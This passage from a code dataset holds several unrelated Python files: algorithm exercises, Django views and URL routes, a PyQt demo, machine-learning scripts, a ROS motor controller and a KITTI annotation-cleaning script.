plot_selection=plot_selection, **fit_beta\n                    )\n                if PLOT_CORR in plot_selection:\n                    plot_correction(fpu_id, \"beta\", **fit_beta)\n\n            if PLOT_FIT in plot_selection:\n                plot_measured_vs_expected_points(fpu_id, **gear_correction)\n\n        if \"R\" in plot_selection:\n            pos_ver_result = ddict[\"positional_verification_result\"]\n            pos_rep_result = ddict[\"positional_repeatability_result\"]\n\n            if pos_ver_result is not None:\n                plot_pos_ver(fpu_id, pos_ver_result, pos_rep_result, opts)\n","sub_path":"vfr/output/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"615651327","text":"from typing import List\n\n\nclass Solution:\n    \"\"\"\n    Problem : 735\n    Name : Shahreen Shahjahan Psyche\n    Time : O(N)\n    Space : O(N) [It could be O(1) if I don't count my output array as an auxiliary array]\n    \n    Passed All Test Cases in LC : Yes\n    \n    Approach : # Initialize a stack\n               # Keep pushing asteroids until two asteroids approach each other, which means the current one is -ve\n                 and the previous one is +ve\n               # Now, if there is a collision, keep popping +ve asteroids of smaller or equal magnitude off the stack\n                 until the stack is empty or a larger +ve asteroid remains\n               # After popping, if the current asteroid never met a positive asteroid of equal or greater magnitude,\n                 it gets pushed back onto the stack\n               # At the end, return the stack\n    \"\"\"\n    def asteroidCollision(self, asteroids: List[int]) -> List[int]:\n        \n        if not asteroids:\n            return []\n        \n        track = []\n        \n        for i in range(len(asteroids)):\n            # when the stack is empty, just push the current value\n            if len(track) == 0:\n                track.append(asteroids[i])\n            else:\n                # if the current asteroid is -ve and the stack top is +ve, they are moving towards each other and there will be a collision\n                if asteroids[i] < 0 and track[-1] > 0:\n                    flag = False\n                    curr = -1\n                    # eliminating all the asteroids whose magnitude is less than or equal to the current asteroid's\n                    while len(track) != 0 and abs(asteroids[i]) >= track[-1] and track[-1] > 0:\n                        curr = track.pop()\n                        # if the popped value equals the magnitude of the current one, set the flag and break\n                        if curr == abs(asteroids[i]):\n                            flag = True\n                            break\n                    # checking whether the current asteroid should be pushed back onto the stack\n                    if (len(track) == 0 and flag == False) or (len(track) != 0 and track[-1] < 0 and flag == False):\n                        track.append(asteroids[i])\n                # if the asteroids are not moving towards each other, there is no collision, so we push the asteroid onto the stack\n                else:\n                    track.append(asteroids[i])\n        \n        return track\n    \n    \n","sub_path":"AsteroidCollision.py","file_name":"AsteroidCollision.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"331937665","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('', views.task_list, name = 'task_list'),\n    path('completed_tasks/', views.completed_tasks, name = 'completed_tasks'),\n    path('<int:pk>/remove', views.task_remove, name = 'task_remove'),\n    path('<int:pk>/complete', views.task_complete, name = 'task_complete'),\n    path('<int:pk>/restore', views.task_restore, name = 'task_restore'),\n    path('<int:pk>/copy', views.task_copy, name = 'task_copy'),\n    path('<int:pk>/edit', views.task_edit, name = 'task_edit'),\n    path('list_list/', views.ListListView.as_view(), name = \"list_list\"),\n    path('removed_lists/', views.removed_lists, name = 'removed_lists'),\n    path('<int:pk>/list_remove/', views.list_remove, name = 'list_remove'),\n    path('<int:pk>/list_delete/', views.list_delete, name = 'list_delete'),\n    path('<int:pk>/list_restore/', views.list_restore, name = 'list_restore'),\n    path('new/', views.list_new, name = 'list_new'),\n    path('<int:pk>/list_edit/', views.list_edit, name='list_edit'),\n    path('<int:pk>/detail/', views.list_detail, name='list_detail'),\n    path('all_lists_delete/', views.all_lists_delete, name='all_lists_delete'),\n    path('create_list/', views.create_list, name='create_list'),\n\n]","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"172100036","text":"import sys\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPixmap, QPalette\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QLabel, QWidget\n\n\nclass QLabelDemo(QWidget):\n\n    def __init__(self):\n        super().__init__()\n        self.setGeometry(300, 300, 500, 500)\n        self.init()\n\n    def init(self):\n        label1 = QLabel(self)\n        label2 = QLabel(self)\n        label3 = QLabel(self)\n        label4 = QLabel(self)\n\n        label1.setText(' this is a text label. 
')\n label1.setAutoFillBackground(True)\n palette = QPalette()\n palette.setColor(QPalette.Window, Qt.blue)\n label1.setPalette(palette)\n label1.setAlignment(Qt.AlignCenter)\n\n label2.setText(\"welcome to use python gui application\")\n\n label3.setAlignment(Qt.AlignLeft)\n label3.setToolTip('this is a image label')\n label3.setPixmap(QPixmap('Screenshot_20191015_190344.png'))\n\n label4.setOpenExternalLinks(True)\n label4.setText(\" welcome to use baidu.com \")\n label4.setAlignment(Qt.AlignRight)\n label4.setToolTip(\"this is a super link\")\n\n v_box = QVBoxLayout()\n v_box.addWidget(label1)\n v_box.addWidget(label2)\n v_box.addWidget(label3)\n v_box.addWidget(label4)\n\n label2.linkHovered.connect(self.linkhovered)\n label3.linkActivated.connect(self.linkclicked)\n\n self.setLayout(v_box)\n self.setWindowTitle('QLabel Demo')\n\n def linkhovered(self):\n print(\"when mouse skip the label2\")\n\n def linkclicked(self):\n print(\"when mouse click the label3\")\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = QLabelDemo()\n main.show()\n sys.exit(app.exec_())\n","sub_path":"src/qLabel.py","file_name":"qLabel.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336803132","text":"from quick_sort import quick_sort\nfrom quick_sort import choose_pivot_median,get_number_of_comparisons\n\n\nimport unittest\n\nclass QuickSortTest(unittest.TestCase):\n\n def totally_unordered_test(self):\n test_case = [9,8,7,6,5,4,3,2,1,0]\n ordered = [0,1,2,3,4,5,6,7,8,9]\n quick_sort(test_case)\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n\n def ordered_test(self):\n test_case = [0,1,2,3,4,5,6,7,8,9]\n ordered = [0,1,2,3,4,5,6,7,8,9]\n quick_sort(test_case)\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n\n def partially_ordered_test(self):\n test_case = [5,6,7,8,9,0,1,2,3,4]\n ordered = [0,1,2,3,4,5,6,7,8,9]\n quick_sort(test_case)\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n\n def test_order_median_method(self):\n test_case = [2, 20, 1, 15, 3, 11, 13, 6, 16, 10, 19, 5, 4, 9, 8, 14, 18, 17, 7, 12] \n\n ordered = [2, 20, 1, 15, 3, 11, 13, 6, 16, 10, 19, 5, 4, 9, 8, 14, 18, 17, 7, 12]\n ordered.sort()\n true_count_number = 55\n test_count_number = quick_sort(test_case,pivot_method=\"median\")\n\n self.assertEqual(ordered,test_case,\"Array not sorted\") \n self.assertEqual(true_count_number,test_count_number,\"Wrong number of counts: {}\".format(test_count_number)) \n\n def test_median_pivot_method(self):\n \n test_single_median_pivot(self,[2, 20, 1, 15, 3, 11, 13, 6, 16, 10, 19, 5, 4, 9, 8, 14, 18, 17, 7, 12],10 ) \n test_single_median_pivot(self,[7, 1, 3, 6, 2, 5, 4, 9, 8] ,7 ) \n test_single_median_pivot(self,[4, 1, 3, 6, 2, 5] ,4 ) \n test_single_median_pivot(self,[2, 1, 3], 2) \n test_single_median_pivot(self,[6, 5] , 6) \n \n def test_get_number_of_comparisons(self):\n pass\n\ndef test_single_median_pivot(test,test_case,correct_median):\n\n median_index = choose_pivot_median(test_case,0,len(test_case)-1)\n median_test = test_case[median_index]\n\n test.assertEqual(correct_median,median_test,\"Wrong median: {}\".format(median_test)) \n \n \n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"divide_and_conquer/week3/quicksort/quick_sort_test.py","file_name":"quick_sort_test.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"607493479","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 23 12:47:30 2018\n\n@author: emrecemaksu\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\nveriler = pd.read_csv('veriler.csv')\nX = veriler.iloc[:,1:4]\ny = veriler.iloc[:,4:]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)\n\nsc = StandardScaler()\nX_SC_train = sc.fit_transform(X_train)\nX_SC_test = sc.fit_transform(X_test)\n\nLOGR = LogisticRegression(random_state=0)\nLOGR.fit(X_SC_train, y_train)\nLOGR_predict = LOGR.predict(X_SC_test)\nprint(LOGR_predict)\nprint(y_test)\n\ncm = confusion_matrix(y_test, LOGR_predict)\nprint(cm)\n\nknn = KNeighborsClassifier(n_neighbors=1, metric='minkowski')\nknn.fit(X_SC_train, y_train)\nknn_pred = knn.predict(X_SC_test)\nprint(knn_pred)\nprint(y_test)\ncm2 = confusion_matrix(y_test, knn_pred)\nprint(cm2)\n","sub_path":"LogisticRegression/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"28083178","text":"# -*- coding: utf-8 -*-\n#\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2015, Krit Chaiso.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of University of Arizona nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom __future__ import division\n\n\n__author__ = 'Krit Chaiso'\n__copyright__ = 'Copyright (c) 2015 Krit Chaiso'\n__credits__ = 'Cara Slutter & Antons Rebguns'\n\n__license__ = 'BSD'\n__maintainer__ = 'Krit Chaiso'\n__email__ = 'krit.c@ku.th'\n\nimport rospy\nfrom dynamixel_controllers.joint_position_controller import JointPositionController\n\n\nclass JointPositionLumyai(JointPositionController):\n    def __init__(self, dxl_io, controller_namespace, port_namespace):\n        JointPositionController.__init__(self, dxl_io, controller_namespace, port_namespace)\n\n        self.actual_encoder_resolution = rospy.get_param(self.controller_namespace + '/actual_encoder_resolution')\n        self.range_radians = rospy.get_param('dynamixel/%s/%d/range_radians' % (self.port_namespace, self.motor_id))\n\n    def pos_rad_to_raw(self, pos_rad):\n        if pos_rad < self.min_angle: pos_rad = self.min_angle\n        elif pos_rad > self.max_angle: pos_rad = self.max_angle\n        pos_raw = self.rad_to_raw(pos_rad, self.initial_position_raw, self.flipped, self.actual_encoder_resolution/self.range_radians)\n        return int(pos_raw * self.ENCODER_RESOLUTION/self.actual_encoder_resolution)\n\n","sub_path":"src/hardware_bridge/joint_position_lumyai.py","file_name":"joint_position_lumyai.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"70455398","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n# @author : 郑祥忠\n# @license : (C) Copyright,2013-2020,广州海格星航科技\n# @contact : dylenzheng@gmail.com\n# @file : modify_annotations_txt.py\n# @time : 4/13/20 5:19 PM\n# @desc : \n'''\n\nimport glob\nimport os\ntxt_list = glob.glob(\"/home/zhex/backup/kitti2/training/label_2/*.txt\")  # paths of all txt files in the labels folder\n\ndef show_category(txt_list):\n    category_list= []\n    for item in txt_list:\n        try:\n            with open(item) as tdf:\n                for each_line in tdf:\n                    labeldata = each_line.strip().split(' ')  # strip surrounding whitespace and split the fields\n                    category_list.append(labeldata[0])  # keep only the first field, i.e. the category\n        except IOError as ioerr:\n            print('File error:'+str(ioerr))\n    print(set(category_list))  # print the set of categories\n\ndef merge(line):\n    each_line=''\n    for i in range(len(line)):\n        if i!= (len(line)-1):\n            each_line=each_line+line[i]+' '\n        else:\n            each_line=each_line+line[i]  # no space after the last field\n    each_line=each_line+'\\n'\n    return (each_line)\n\ndef merge_index(line):\n    each_line=''\n    for i in range(len(line)):\n        if i!= (len(line)-1):\n            each_line=each_line+line[i]+' '\n        else:\n            each_line=each_line+line[i]  # no space after the last field\n    each_line=each_line+'\\n'\n    return (each_line)\n\nprint('before modify categories are:\\n')\nshow_category(txt_list)\n\nfor item in txt_list:\n    new_txt=[]\n    try:\n        with open(item, 'r') as r_tdf:\n            for each_line in r_tdf:\n                labeldata = each_line.strip().split(' ')\n\n                # if labeldata[0] in ['Truck','Van','Tram']:  # merge car classes\n                if labeldata[0] in ['Car','Van','Tram','Truck']:  # merge car classes into a single 'vehicle' category\n                    labeldata[0] = labeldata[0].replace(labeldata[0],'vehicle')\n\n                # if labeldata[0] == 'Person_sitting':  # merge pedestrian classes\n                # labeldata[0] = labeldata[0].replace(labeldata[0],'Pedestrian')\n\n                if labeldata[0] in ['Person_sitting','Pedestrian','Cyclist']:\n                    continue\n\n                if labeldata[0] == 'DontCare':  # ignore the DontCare class\n                    continue\n\n                if labeldata[0] == 'Misc':  # ignore the Misc class\n                    continue\n                new_txt.append(merge_index(labeldata))  # collect lines to rewrite the txt file\n\n\n        with open(item,'w+') as w_tdf:  # w+ truncates the original file and writes the new content\n            for temp in new_txt:\n                w_tdf.write(temp)\n\n\n\n    except IOError as ioerr:\n        print('File error:'+str(ioerr))\nprint('\\nafter modify categories are:\\n')\nshow_category(txt_list)\n","sub_path":"bdd_kitti/kitti/modify_annotations_txt.py","file_name":"modify_annotations_txt.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"508179676","text":"import numpy as np\nimport sklearn\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom scipy.interpolate import Rbf\nimport matplotlib.pyplot as plt\n\nimport my_tf_pkg as mtf\n\n## Data sets\ndef get_kernel_matrix(x,W,S):\n    beta = get_beta_np(S)  # assumes a get_beta_np helper is available in scope\n    Z = -beta*euclidean_distances(X=x,Y=W,squared=True)\n    K = np.exp(Z)\n    return K\n\n# def get_index():\n#     index = []\n#     for i, center in enumerate(nb_centers):\n#         target_center\n#         if target_center == center:\n#\n\nN = 60000\nlow_x =-2*np.pi\nhigh_x=2*np.pi\nX = low_x + (high_x - low_x) * np.random.rand(N,1)\nX_test = low_x + (high_x - low_x) * np.random.rand(N,1)\n# f(x) = 2*(2*cos(x)^2 - 1)^2 - 1\nf = lambda x: 2*np.power( 2*np.power( np.cos(x) ,2) - 1, 2) - 1\nY = f(X)\nY_test = f(X_test)\n\n#stddev = 1\nstddev = 1.8\nreplace = False # with or without replacement\nnb_centers_reconstruct = [6, 12, 24, 36, 48] # number of centers for RBF\nnb_centers = [3, 6, 9, 12, 16, 24, 30, 39, 48, 55]\nnb_centers = range(2,25)\ncolours = ['g','r','c','m','y']\n#\nrbf_predictions_reconstruct_train = []\nrbf_predictions_reconstruct_test = []\n\n#rbf_predictions_test = []\nrbf_errors_test = []\n\n#rbf_predictions_train = []\nrbf_errors_train = []\nfor K in nb_centers:\n    indices=np.random.choice(a=N,size=K,replace=replace) # choose numbers from 0 to D^(1)\n    subsampled_data_points=X[indices,:] # M_sub x D\n\n    beta = np.power(1.0/stddev,2)\n    Kern = np.exp(-beta*euclidean_distances(X=X,Y=subsampled_data_points,squared=True)) # N_train x D^1\n    (C,_,_,_) = np.linalg.lstsq(Kern,Y)\n\n    #indices=np.random.choice(a=N,size=K,replace=replace) # choose numbers from 0 to D^(1)\n    #subsampled_data_points=X_test[indices,:] # M_sub x D\n    Kern_test = np.exp(-beta*euclidean_distances(X=X_test,Y=subsampled_data_points,squared=True)) # N_test x D^1\n\n    Y_pred = np.dot( Kern , C )\n    Y_pred_test = np.dot( Kern_test , C )\n\n    #rbf_predictions_train.append(Y_pred)\n    train_error = sklearn.metrics.mean_squared_error(Y, Y_pred)\n    rbf_errors_train.append(train_error)\n    #rbf_predictions_test.append(Y_pred_test)\n    test_error = sklearn.metrics.mean_squared_error(Y_test, Y_pred_test)\n    rbf_errors_test.append(test_error)\n    if K in nb_centers_reconstruct:\n        rbf_predictions_reconstruct_train.append(Y_pred)\n        rbf_predictions_reconstruct_test.append(Y_pred_test)\n\ndef plot_reconstruction(fig_num, X_original,Y_original, nb_centers, rbf_predictions, colours, markersize=3, title_name='Reconstruction'):\n    fig = plt.figure(fig_num)\n    plt.xlabel('number of centers')\n    plt.ylabel('Reconstruction')\n    plt.title(title_name)\n    plt.plot(X_original, Y_original,'bo', label='Original data', markersize=markersize)\n    for i, Y_pred in enumerate(rbf_predictions):\n        colour = colours[i]\n        K = nb_centers[i]\n        
plt.plot(X_original, Y_pred, colour+'o', label='RBF'+str(K), markersize=markersize)\n\ndef plot_errors(nb_centers, rbf_errors,label='Errors', markersize=3, colour='b'):\n plt.xlabel('number of centers')\n plt.ylabel('squared error (l2 loss)')\n plt.plot(nb_centers, rbf_errors, colour, label=label, markersize=3)\n plt.plot(nb_centers, rbf_errors, colour+'o')\n\nplot_reconstruction(fig_num=1, X_original=X,Y_original=Y, nb_centers=nb_centers_reconstruct, rbf_predictions=rbf_predictions_reconstruct_train, colours=colours, markersize=3,title_name='Reconstruction_train')\nplot_reconstruction(fig_num=2, X_original=X_test,Y_original=Y_test, nb_centers=nb_centers_reconstruct, \\\n rbf_predictions=rbf_predictions_reconstruct_test, colours=colours, markersize=3,title_name='Reconstruction_test')\nplt.figure(3)\nplot_errors(nb_centers, rbf_errors_train,label='train_Errors', markersize=3,colour='b')\nplot_errors(nb_centers, rbf_errors_test,label='test_Errors', markersize=3,colour='r')\n#\nplt.legend()\nplt.show()\n","sub_path":"other/tf_experiments_scripts_with_mistake/old_files/krls_so.py","file_name":"krls_so.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"403087239","text":"import django.contrib.auth as auth\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.conf import settings\nfrom django.contrib.formtools.wizard.views import SessionWizardView\nimport os\nfrom datetime import date, timedelta\nfrom django.contrib import messages\nfrom opticon.globalstrings import Globalstrings\nfrom opticon.globalvars import Globalvars\n\nfrom opticon.utils import get_employee_list\nfrom core.forms import AssignEmployeesForm, InviteSubcontractorForm, OrdernumberForm, InvitationTransferForm\nfrom core.models import Order, OrderInvitation, OrderManager, SiteDocuments\nfrom django.forms.formsets import formset_factory\nfrom django.http.response import HttpResponseForbidden, Http404\nfrom collections import OrderedDict\nimport datetime\n\n@login_required\ndef invitation(request, invitation_id):\n\tgs = Globalstrings()\n\tgv = Globalvars()\n\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\torder_from = Order.objects.get(id=invitation.order_from_id)\n\tdecline = None\n\n\tif invitation.invitation_created <= gv.invitation_expired:\n\t\treturn redirect('core:invitation_expired', invitation_id)\n\t\n\tif request.method == 'POST':\n\t\tif gs.decline in request.POST:\n\t\t\tsetattr(invitation, 'order_accepted', 'D')\n\t\t\tsetattr(invitation, 'invitation_declined', datetime.date.today())\n\t\t\tinvitation.save()\n\t\t\treturn redirect('core:dashboard')\n\t\telif gs.accept in request.POST:\n\t\t\treturn redirect('/invitation/' + str(invitation_id) + '/wizard/')\n\t\t\t\n\treturn render(\n\t\trequest, \n\t\t'core/invitation.html',\n\t\t{\n\t\t\t'invitation': invitation,\n\t\t\t'order': order_from,\n\t\t\t'headline': gs.accept_site,\n\t\t\t'cancel_text': gs.cancel,\n\t\t\t'invite_text': gs.invite_text.format(order_from.company, order_from.site),\n\t\t\t'accept_text': gs.accept,\n\t\t\t'decline_text': gs.decline,\n\t\t\t'decline': decline,\n\t\t}\n\t)\n\n@login_required\ndef invitation_expired(request, invitation_id):\n\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\torder_from = Order.objects.get(id=invitation.order_from_id)\n\tgs = Globalstrings()\n\n\tif request.method == 'POST':\n\t\tif gs.remove in 
request.POST:\n\t\t\tsetattr(invitation, 'order_accepted', 'D')\n\t\t\tsetattr(invitation, 'invitation_declined', datetime.date.today())\n\t\t\tinvitation.save()\n\t\t\treturn redirect('core:dashboard')\n\n\treturn render(\n\t\trequest,\n\t\t'core/invitation_expired.html',\n\t\t{\n\t\t\t'invitation': invitation,\n\t\t\t'headline': gs.invitation_expired_remove,\n\t\t\t'text': gs.invitation_expired_text.format(order_from.company, order_from.site),\n\t\t\t'cancel_text': gs.cancel,\n\t\t\t'order': order_from,\n\t\t\t'decline_text': gs.remove,\n\t\t\t'contact_person_text': gs.contact_person,\n\t\t\t'mobile_text': gs.mobile,\n\t\t}\n\t)\n\n@login_required\ndef invitation_finished(request, order_id):\n\tgs = Globalstrings()\n\torder = Order.objects.get(id=order_id)\n\tdocs = SiteDocuments.objects.filter(site = order.site)\n\t\n\treturn render(\n\t\trequest, \n\t\t'core/invitation_finished.html',\n\t\t{\n\t\t\t'order': order,\n\t\t\t'docs': docs,\n\t\t\t'headline': gs.site_accepted,\n\t\t\t'subheadline': gs.downloads,\n\t\t\t'next_text': gs.to_site,\n\t\t\t'downloads_text': gs.downloads,\n\t\t}\n\t)\n\t\ndef invitation_splitter(request, invitation_id):\n\tgs = Globalstrings()\n\tgv = Globalvars()\n\ttry:\n\t\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\texcept:\n\t\traise Http404(gs.unknown_invitation)\n\tinvitator = invitation.order_from.company.name\n\tsite = invitation.site.name\n\t\n\tif invitation.no_link:\n\t\treturn HttpResponseForbidden()\n\t\n\tif invitation.invitation_created <= gv.invitation_expired:\n\t\tinvitation.delete()\n\t\treturn render(\n\t\t\trequest,\n\t\t\t'core/new_invitation_expired.html',\n\t\t\t{\n\t\t\t\t'headline': gs.invitation_expired_headline,\n\t\t\t\t'content_text': gs.invitation_expired_text.format(invitator, site),\n\t\t\t}\n\t\t)\n\t\n\treturn render(\n\t\trequest, \n\t\t'core/invitation_splitter.html',\n\t\t{\n\t\t\t'headline': gs.order_invitation,\n\t\t\t'text': gs.order_invitation_text.format(invitator, invitation.invited_subcompany, site),\n\t\t\t'subheadline': gs.company_registered_headline,\n\t\t\t'question': gs.company_registered_text,\n\t\t\t'create_account': gs.create_account,\n\t\t\t'account_exists': gs.company_registered,\n\t\t\t'invitation': invitation,\n\t\t\t'please_logout_text': gs.please_logout_text,\n\t\t}\n\t)\n\t\ndef invitation_transfer(request, invitation_id):\n\tgs = Globalstrings()\n\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\tinvitator = invitation.order_from.company.name\n\tsite = invitation.site.name\n\tform = InvitationTransferForm()\n\t\n\tif invitation.no_link:\n\t\treturn HttpResponseForbidden()\n\t\n\tif request.method == 'POST':\n\t\tform = InvitationTransferForm(request.POST)\n\t\tif form.is_valid():\n\t\t\ttransfer_success = form.save(invitation)\n\t\t\tif transfer_success:\n\t\t\t\treturn redirect('core:index')\n\t\t\telse:\n\t\t\t\tmessages.error(request, gs.not_known_email)\n\t\t\t\t\n\t\n\treturn render(\n\t\trequest,\n\t\t'core/invitation_transfer.html',\n\t\t{\n\t\t\t'headline': gs.order_invitation,\n\t\t\t'text': gs.order_invitation_text.format(invitator, invitation.invited_subcompany, site),\n\t\t\t'subheadline': gs.invitation_transfer_headline,\n\t\t\t'question': gs.invitation_transfer_text,\n\t\t\t'transfer': gs.transfer,\n\t\t\t'form': form,\n\t\t\t'invitation': invitation,\n\t\t}\n\t)\n\t\nfrom django.db import transaction\n\nInviteSubcontractorFormset = 
formset_factory(\n\t\t\t\t\t\t\t\t\t\t\tform=InviteSubcontractorForm,\n\t\t\t\t\t\t\t\t\t\t\textra=1,\n\t\t\t\t\t\t\t\t\t\t\tmax_num=10,\n\t\t\t\t\t\t\t\t\t\t\tcan_delete=True\n\t\t\t\t\t\t\t\t\t\t\t)\nFORMS = [AssignEmployeesForm, InviteSubcontractorFormset, OrdernumberForm]\n\nclass InvitationWizard(SessionWizardView):\n\ttemplate_name = 'invitation_wizard.html'\n\tskip_steps = []\n\textra = ['1']\n\tsubs = []\n\t\t\n\tdef get_form_kwargs(self, step=None):\n\t\tkwargs = {}\n\t\tif step is None:\n\t\t\tstep = self.steps.current\n\t\tif step == '0':\n\t\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\t\tself.request.session['assign_type']='assign'\n\t\t\tkwargs.update(\n\t\t\t\t{\n\t\t\t\t\t'order': 'invitation',\n\t\t\t\t\t'request': self.request\t\t\t\t\t\n\t\t\t\t}\n\t\t\t)\n\t\treturn kwargs\n\t\t\n\tdef get_context_data(self, form, **kwargs):\n\t\tcontext = super(InvitationWizard, self).get_context_data(form, **kwargs)\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\torder_from = Order.objects.get(id=invitation.order_from_id)\n\t\tgs = Globalstrings()\n\t\tcontext.update(\n\t\t\t{\n\t\t\t\t'order': order_from,\n\t\t\t\t'headline': gs.accept_site,\n\t\t\t\t'cancel_text': gs.cancel,\n\t\t\t\t'skip_text': gs.skip,\n\t\t\t\t'next_text': gs.next,\n\t\t\t\t'complete_text': gs.complete,\n\t\t\t\t'invite_text': gs.invite_subcontractors_text,\n\t\t\t\t'company_text': gs.company,\n\t\t\t\t'contact_text': gs.contact_person,\n\t\t\t\t'subs': self.subs,\n\t\t\t\t'enter_ordernumber': gs.enter_ordernumber,\n\t\t\t}\n\t\t)\n\t\tif self.steps.current == '0':\n\t\t\tcontext.update({\n\t\t\t\t\t\t'subheadline': gs.assign_employees,\n\t\t\t\t\t\t})\n\t\telif self.steps.current == '1':\n\t\t\tcontext.update({\n\t\t\t\t\t\t'subheadline': gs.invite_subcontractors,\n\t\t\t\t\t\t})\n\t\telif self.steps.current == '2':\n\t\t\tcontext.update({\n\t\t\t\t\t\t'subheadline': gs.ordernumber,\n\t\t\t\t\t\t})\n\t\treturn context\n\t\n\tdef post(self, *args, **kwargs):\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\tdata = self.request.POST\n\t\tif 'Skip' in data:\n\t\t\tself.skip_steps.append(self.steps.current)\n\n\t\t\tform = self.get_form(data=self.request.POST, files=self.request.FILES)\n\t\t\tif self.steps.current == self.steps.last:\n\t\t\t\treturn self.render_done(form, **kwargs)\n\t\t\telse:\n\t\t\t\treturn self.render_next_step(form)\n\t\t\t\n\t\telif 'plus' in data:\n\t\t\textra = int(self.extra[0])\n\t\t\tself.extra[0] = str(extra + 1)\n\t\t\tInviteSubcontractorFormset = formset_factory(InviteSubcontractorForm, extra=extra)\n\t\t\tformset = InviteSubcontractorFormset()\n\t\t\tif extra == 1:\n\t\t\t\tsub = []\n\t\t\t\tsub.append(data['1-0-companyname'])\n\t\t\t\tsub.append(data['1-0-firstname'])\n\t\t\t\tsub.append(data['1-0-lastname'])\n\t\t\t\tsub.append(data['1-0-email'])\n\t\t\t\tself.subs.append(sub)\n\t\t\telse:\n\t\t\t\tself.subs.clear()\n\t\t\t\ti = 0\n\t\t\t\twhile i < extra:\n\t\t\t\t\tsub = []\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-companyname'])\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-firstname'])\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-lastname'])\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-email'])\n\t\t\t\t\tself.subs.append(sub)\n\t\t\t\t\ti = i + 1\n\t\t\tform = self.get_form(data=self.request.POST, files=self.request.FILES)\n\n\t\t\treturn self.render(formset)\n\n\t\telif self.steps.current == '0':\n\t\t\tform = AssignEmployeesForm(self.request.POST, request=self.request, 
